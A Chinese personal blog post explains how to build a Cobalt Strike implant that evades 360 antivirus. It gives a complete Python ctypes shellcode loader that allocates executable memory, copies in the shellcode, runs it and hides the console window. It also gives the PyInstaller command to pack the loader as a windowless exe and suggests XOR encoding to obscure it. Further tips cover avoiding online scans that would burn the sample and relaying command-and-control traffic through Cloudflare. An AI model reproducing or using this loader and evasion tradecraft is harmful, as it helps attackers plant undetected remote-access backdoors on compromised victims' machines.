Leohearts的Blog

拥有一颗坚强而又温柔的心 *博客主题正在开发

cover

用python做一个能过360的免杀CS马

拿到shell了, 机器上有个360??
做个免杀吧!
更新: python真的不行...还是老老实实C++写吧 (

本文将通过python的ctypes库加载Cobalt Strike马实现免杀.

其实这已经不是一个新方法了; 但是它依然十分有效, 即使不做任何混淆也能过360.

写个python文件加载CS shellcode

shellcode写到内存中, 用ctypes.windll加载即可.

先用CS生成shellcode, Output类型选python

360-gen-payload.webp

然后放进这份网传的python代码中, 替换掉buf.

from ctypes import *
import ctypes
buf =  ""
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
    buf = c_char_p(buffer)
    size = len(buffer)
    addr = libc.valloc(size)
    addr = c_void_p(addr)
    if 0 == addr: 
        raise Exception("Failed to allocate memory")
    memmove(addr, buf, size)
    if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
        raise Exception("Failed to set protection on buffer")
    return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
       if 1:
              ctypes.windll.user32.ShowWindow(whnd, 0)   
              ctypes.windll.kernel32.CloseHandle(whnd)
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                     buf,
                                     ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
记得全程用python2. python3.9因未知原因失败了.

它运行一下就可以CS上线了.

混淆/编码

不编码也能过360, 不过还是编码一下比较保险一些.

你可以尝试:

  • 编码shellcode
  • 编码整个程序然后exec
  • etc...

可以对每个byte异或一个字符, 或者上加密.

用PyInstaller打包成exe

很简单,

pyinstaller.exe --onefile -w ./payload.py

即可.

注意: 如果你编码了程序, 记得在最外层import所有需要的库, 否则执行时会因为找不到库而出错.

不要在联网状态下扫描你的程序, 不然第二天它就挂了(

是这样...
第二天挂了之后, 再尝试换个花样上去几分钟就被360杀了, 可能360记录了我的ip之类的.
考虑上cloudflare转发?

VT结果: https://www.virustotal.com/gui/file/3a2c7ca6533139de0d727649e554e507ec5af4066d3753bfa71f93be613990e6/detection